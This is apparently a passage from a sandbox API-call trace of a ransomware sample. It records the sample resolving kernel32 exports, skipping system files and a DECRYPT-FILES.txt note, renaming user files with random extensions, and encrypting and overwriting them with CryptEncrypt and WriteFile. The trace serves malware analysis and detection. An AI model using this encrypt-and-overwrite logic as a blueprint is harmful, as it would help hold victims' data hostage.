returned="DnsHostnameToComputerNameW" [0079.812] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0079.812] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0079.812] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0079.812] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0079.812] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0079.812] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0079.812] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0079.812] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0079.812] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0079.812] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0079.813] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0079.813] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0079.813] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0079.813] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0079.813] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0079.813] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0079.813] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0079.813] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0079.813] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0079.813] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0079.813] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0079.813] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0079.813] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0079.813] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0079.813] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0079.813] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0079.813] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0079.813] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0079.813] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0079.813] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0079.813] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0079.813] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0079.813] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0079.813] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0079.813] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0079.813] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0079.813] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0079.813] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0079.813] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0079.813] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0079.813] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0079.813] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0079.814] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0079.814] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\Music.library-ms") returned 90 [0079.814] wsprintfW (in: param_1=0x3f2d730, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\Music.library-ms.0qY76lu") returned 98 [0079.814] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\Music.library-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\libraries\\music.library-ms"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\Music.library-ms.0qY76lu" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\libraries\\music.library-ms.0qy76lu"), dwFlags=0x0) returned 1 [0079.815] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.815] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.816] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.816] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x28d97bc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2d207440, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d207440, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0xe23, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pictures.library-ms", cAlternateFileName="PICTUR~1.LIB")) returned 1 [0079.816] lstrcmpiW (lpString1="Pictures.library-ms", lpString2="DECRYPT-FILES.txt") returned 1 [0079.816] lstrcmpiW (lpString1="Pictures.library-ms", lpString2="autorun.inf") returned 1 [0079.816] lstrcmpiW (lpString1="Pictures.library-ms", lpString2="boot.ini") returned 1 [0079.816] lstrcmpiW (lpString1="Pictures.library-ms", lpString2="desktop.ini") returned 1 [0079.816] lstrcmpiW (lpString1="Pictures.library-ms", lpString2="ntuser.dat") returned 1 [0079.816] lstrcmpiW (lpString1="Pictures.library-ms", lpString2="iconcache.db") returned 1 [0079.816] lstrcmpiW (lpString1="Pictures.library-ms", lpString2="bootsect.bak") returned 1 [0079.816] lstrcmpiW (lpString1="Pictures.library-ms", lpString2="ntuser.dat.log") returned 1 [0079.816] lstrcmpiW (lpString1="Pictures.library-ms", lpString2="thumbs.db") returned -1 [0079.816] lstrcmpiW (lpString1="Pictures.library-ms", lpString2="Bootfont.bin") returned 1 [0079.816] lstrlenW (lpString="Pictures.library-ms") returned 19 [0079.816] lstrcmpiW (lpString1="library-ms", lpString2="lnk") returned -1 [0079.816] lstrcmpiW (lpString1="library-ms", lpString2="exe") returned 1 [0079.816] lstrcmpiW (lpString1="library-ms", lpString2="sys") returned -1 [0079.816] lstrcmpiW (lpString1="library-ms", lpString2="dll") returned 1 [0079.816] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\") returned 74 [0079.816] lstrlenW (lpString="Pictures.library-ms") returned 19 [0079.816] lstrcpyW (in: lpString1=0x3f2df30, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\" [0079.816] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\", lpString2="Pictures.library-ms" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\Pictures.library-ms") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\Pictures.library-ms" [0079.816] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0079.817] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\Pictures.library-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\libraries\\pictures.library-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x458 [0079.817] GetFileSizeEx (in: hFile=0x458, lpFileSize=0x3f2d6f8 | out: lpFileSize=0x3f2d6f8*=3619) returned 1 [0079.817] CreateFileMappingW (hFile=0x458, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x45c [0079.817] MapViewOfFile (hFileMappingObject=0x45c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfc0000 [0079.817] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0079.817] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0079.817] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0079.818] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10d0000*, pdwDataLen=0x3f2d660*=0x28, dwBufLen=0x100 | out: pbData=0x10d0000*, pdwDataLen=0x3f2d660*=0x100) returned 1 [0079.818] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10e0000 [0079.818] VirtualFree (lpAddress=0x10e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.818] UnmapViewOfFile (lpBaseAddress=0xfc0000) returned 1 [0079.819] CloseHandle (hObject=0x45c) returned 1 [0079.819] SetFilePointerEx (in: hFile=0x458, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.819] WriteFile (in: hFile=0x458, lpBuffer=0x10d0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2d680, lpOverlapped=0x0 | out: lpBuffer=0x10d0000*, lpNumberOfBytesWritten=0x3f2d680*=0x108, lpOverlapped=0x0) returned 1 [0079.819] CloseHandle (hObject=0x0) returned 0 [0079.820] CloseHandle (hObject=0x458) returned 1 [0079.820] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.821] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.821] GetTickCount () returned 0x114c717 [0079.821] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0079.821] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0079.821] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0079.822] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0079.822] lstrlenA (lpString="kernel32.dll") returned 12 [0079.822] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0079.822] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0079.822] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0079.822] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0079.822] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0079.822] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0079.822] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0079.822] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0079.822] lstrlenA (lpString="ADDATOMA") returned 8 [0079.822] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0079.822] lstrlenA (lpString="ADDATOMW") returned 8 [0079.822] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0079.822] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0079.822] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0079.823] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0079.823] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0079.823] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0079.823] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0079.823] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0079.823] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0079.823] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0079.823] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0079.823] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0079.823] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0079.823] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0079.823] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0079.823] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0079.823] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0079.823] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0079.823] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0079.823] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0079.823] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0079.823] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0079.823] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0079.823] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0079.823] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0079.823] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0079.823] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0079.823] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0079.823] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0079.823] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0079.823] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0079.823] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0079.823] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0079.823] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0079.823] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0079.823] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0079.823] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0079.823] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0079.823] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0079.823] lstrlenA (lpString="BACKUPREAD") returned 10 [0079.824] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0079.824] lstrlenA (lpString="BACKUPSEEK") returned 10 [0079.824] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0079.824] lstrlenA (lpString="BACKUPWRITE") returned 11 [0079.824] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0079.824] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0079.824] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0079.824] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0079.824] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0079.824] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0079.824] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0079.824] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0079.824] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0079.824] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0079.824] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0079.824] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0079.824] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0079.824] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0079.824] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0079.824] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0079.824] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0079.824] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0079.824] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0079.824] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0079.824] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0079.824] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0079.824] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0079.824] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0079.824] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0079.824] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0079.824] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0079.824] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0079.824] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0079.824] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0079.824] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0079.824] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0079.824] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0079.825] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0079.825] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0079.825] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0079.825] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0079.825] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0079.825] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0079.825] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0079.825] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0079.825] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0079.825] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0079.825] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0079.825] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0079.825] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0079.825] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0079.825] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0079.825] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0079.825] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0079.825] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0079.825] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0079.825] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0079.825] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0079.825] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0079.825] lstrlenA (lpString="BEEP") returned 4 [0079.825] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0079.825] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0079.825] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0079.825] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0079.825] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0079.825] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0079.825] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0079.825] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0079.825] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0079.825] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0079.825] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0079.825] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0079.826] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0079.826] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0079.826] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0079.826] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0079.826] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0079.826] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0079.826] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0079.826] lstrlenA 